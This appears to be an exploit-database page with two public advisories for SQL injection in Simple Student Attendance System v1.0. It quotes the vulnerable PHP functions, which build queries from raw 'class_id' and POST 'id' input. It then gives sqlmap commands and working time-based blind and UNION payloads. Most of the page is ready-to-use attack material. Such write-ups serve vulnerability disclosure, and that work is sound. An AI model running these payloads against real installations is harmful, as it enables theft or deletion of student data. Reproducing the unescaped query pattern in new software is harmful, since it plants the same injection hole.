Share
## https://sploitus.com/exploit?id=PACKETSTORM:177385
# Exploit Title: Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection  
# Date: 26 December 2023  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor: oretnom23  
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip  
# Version: v1.0  
# Tested on: Mac OSX, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
Source Code(/php-attendance/classes/actions.class.php):  
  
public function attendanceStudents($class_id = "", $class_date = ""){  
if(empty($class_id) || empty($class_date))  
return [];  
$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";  
$qry = $this->conn->query($sql);  
$result = $qry->fetch_all(MYSQLI_ASSOC);  
return $result;  
}  
  
-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch  
---  
Parameter: class_id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 6 columns  
Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20  
---  
  
  
  
  
---------------  
  
# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection  
# Date: 26 December 2023  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor: oretnom23  
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip  
# Version: v1.0  
# Tested on: Mac OSX, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
Source Code(/php-attendance/classes/actions.class.php):  
  
public function delete_student(){  
extract($_POST);  
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");  
if($delete){  
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];  
return [ "status" => "success" ];  
}else{  
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];  
return [ "status" => "error", "Student has failed to deleted!" ];  
}  
}  
  
-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch  
---  
Parameter: id (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW  
---